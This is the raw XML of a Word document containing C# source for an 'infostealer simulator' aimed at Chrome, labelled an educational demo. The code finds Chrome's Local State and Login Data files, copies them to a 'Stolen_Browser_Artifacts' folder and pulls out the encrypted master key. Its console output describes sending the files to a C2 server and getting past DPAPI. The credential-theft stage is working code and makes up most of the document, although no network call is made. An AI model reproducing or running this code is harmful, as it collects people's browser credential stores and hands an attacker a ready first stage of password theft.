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1A79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using System;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B75D2A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using System.IO;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7DD97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using System.Text.Json;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0D8A5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using System.Security.Cryptography; // Used here only for demonstration context, not actual DPAPI access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3480339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3547425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namespace ChromeStealerDemo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C865A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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EFDEE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public class InfostealerSimulator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78462E3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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3767AA9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 --- CONSTANTS AND TARGET PATHS ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F08BFD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3A80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 This is the common location for Chromium-based browsers (Chrome, Edge, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60417B4A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static readonly string AppDataPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23BDE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static readonly string ChromeUserDataPath = Path.Combine(AppDataPath, "Google", "Chrome", "User Data");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539B9C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static readonly string DefaultProfilePath = Path.Combine(ChromeUserDataPath, "Default");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02983C1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254523E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 The two most critical files attackers steal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68802D7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const string LocalStateFileName = "Local State";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C199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const string LoginDataFileName = "Login Data";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204DE7D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C4930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 Output directory where the stolen files are stored before transfer to C2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B493E8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static readonly string StolenDataOutput = "C:\\Stolen_Browser_Artifacts";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F153E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1C2BC27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&lt;summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D0465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Main method to simulate the infostealer payload executing on the victim's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322856A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&lt;/summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090D14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public static void Main(string[] args)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB8983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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB505A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Console.Title = "Infostealer Key Extraction Simulator (Educational Demo)";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA7631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Console.WriteLine("===== SIMULATING INFOTEALER MALWARE EXECUTION =====");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5991276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30A136D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// 1. Ensure the output directory for the stolen data exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0C3B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if (!Directory.Exists(StolenDataOutput))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0520605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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461D2A9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Directory.CreateDirectory(StolenDataOutput);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F8EC0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Console.WriteLine($"[SETUP] Created output directory: {StolenDataOutput}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5382BED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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF8409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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED92FD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// 2. Execute the extraction sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0E7FB7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ExtractEncryptedMasterKey();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046532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ExtractEncryptedLoginData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F066B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05A258A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            Console.WriteLine("\n=================================================");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E9E2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Console.ForegroundColor = ConsoleColor.Yellow;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5777436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Console.WriteLine("[CRITICAL STEP 3: ATTACKER'S SERVER PROCESSING]");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562519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Console.ResetColor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1C38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Console.WriteLine($"The attacker now has the two key files in {StolenDataOutput}.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B172DE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Console.WriteLine("The next step in the real attack chain would be:");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33487CD7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Console.WriteLine("1. Offloading these files to the attacker's server (C2).");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA04F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Console.WriteLine("2. Using specialized software to bypass DPAPI and decrypt the key.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE69A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Console.WriteLine("3. Using the decrypted key to restore all passwords and cookies.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7FC5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Console.WriteLine("--- SIMULATION ENDED ---");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74596DC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4433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5B23F83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&lt;summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF712C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Locates and extracts the Local State file containing the encrypted master key (DPAPI blob).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A98353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&lt;/summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3F099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static void ExtractEncryptedMasterKey()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F30E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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E317D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string sourcePath = Path.Combine(ChromeUserDataPath, LocalStateFileName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A16160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string destPath = Path.Combine(StolenDataOutput, LocalStateFileName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C57E79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235CEFB7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Console.WriteLine($"\n[PHASE 1] Locating Master Key: {sourcePath}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F65011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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E8BA3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if (File.Exists(sourcePath))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D5D9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B98B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try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355E3C7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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B42332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// Copy the file containing the encrypted master key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0AF5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File.Copy(sourcePath, destPath, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564460F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Console.ForegroundColor = ConsoleColor.Green;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1848F04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Console.WriteLine($"[SUCCESS] Stole Encrypted Local State Key: {destPath}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4137642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Console.ResetColor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A367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73D918B9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// --- EXPLANATION OF THE STOLEN KEY DATA ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A965DB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25959CD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// In a real attack, the malware would parse this JSON file to get the base64 string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AE541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// The string looks like the one you provided (FtYWCZSwbMgGHDmHB9mB5dn...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC155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string jsonContent = File.ReadAllText(destPath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172AE27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using (JsonDocument document = JsonDocument.Parse(jsonContent))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633E32C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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642E4CA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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        if (document.RootElement.TryGetProperty("os_crypt", out var osCrypt) &amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3EF55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osCrypt.TryGetProperty("encrypted_key", out var encryptedKeyElement))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D56C23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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5465163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string encryptedKeyBase64 = encryptedKeyElement.GetString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45110C59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Console.WriteLine($"[DATA] Encrypted Key Base64 Length: {encryptedKeyBase64.Length}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A13952A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4E362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// THIS IS THE KEY THE ATTACKER MUST DECRYPT OFFLINE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7FBA4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Console.ForegroundColor = ConsoleColor.Yellow;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621AF0CA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Console.WriteLine($"[KEY]: {encryptedKeyBase64.Substring(0, 50)}... (STOLEN)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9466E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Console.ResetColor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C668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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E358B1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    Console.WriteLine("!!! This key is useless until the attacker bypasses DPAPI on their server. !!!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77254FC9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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72C3D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CFBF4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA259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catch (Exception ex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B0018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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238117A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Console.ForegroundColor = ConsoleColor.Red;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03695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Console.WriteLine($"[ERROR] Failed to steal Local State: {ex.Message}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EBDC6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Console.ResetColor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787454E7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EA262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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC70A07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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8702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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E54730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Console.WriteLine("[WARN] Chrome Local State file not found. Is Chrome installed?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE6123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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1071440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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B588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398FC4F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&lt;summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8387E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Locates and extracts the database file containing all the AES-encrypted user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60026D4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/// &lt;/summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5827495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private static void ExtractEncryptedLoginData()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76361EF8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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154EF40D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string sourcePath = Path.Combine(DefaultProfilePath, LoginDataFileName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F5560A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string destPath = Path.Combine(StolenDataOutput, LoginDataFileName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF283C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28B5D0A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Console.WriteLine($"\n[PHASE 2] Locating Encrypted Credentials: {sourcePath}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621206A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</w:p>
    <w:p w14:paraId="689553A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if (File.Exists(sourcePath))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B66570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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E4FA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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821BA7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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FA4A8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// Copy the SQL database containing all encrypted passwords, cookies, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B0AB1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// The password field in this database is encrypted with the Master Key stolen in Phase 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA611B9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File.Copy(sourcePath, destPath, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D02D5E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Console.ForegroundColor = ConsoleColor.Green;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D5B845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Console.WriteLine($"[SUCCESS] Stole Encrypted Credentials Database: {destPath}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620AFA5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Console.ResetColor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A33D70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Console.WriteLine($"[INFO] This database is useless without the decrypted Master Key.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CD943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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BCE0C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catch (Exception ex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6708B684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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544EDFE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Console.ForegroundColor = ConsoleColor.Red;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F1C8E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Console.WriteLine($"[ERROR] Failed to steal Login Data: {ex.Message}");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B6755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    Console.ResetColor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C0F98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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263279BB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7974B6C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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95B556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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435A5612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    Console.WriteLine("[WARN] Chrome Login Data file not found. No passwords to steal?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA4C25C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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC12ABF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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F91CDC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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779151BE" w14:textId="77777777" w:rsidR="00637AE7" w:rsidRPr="00CA236E" w:rsidRDefault="00637AE7" w:rsidP="00CA236E">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA236E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00000000" w:rsidRPr="00CA236E" w:rsidSect="00CA236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6E"/>
    <w:rsid w:val="00004DD9"/>
    <w:rsid w:val="00637AE7"/>
    <w:rsid w:val="00C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2D5B1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D79C673A-B340-D94B-9A15-A0522577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A23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23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2025-11-27T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-27T12:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>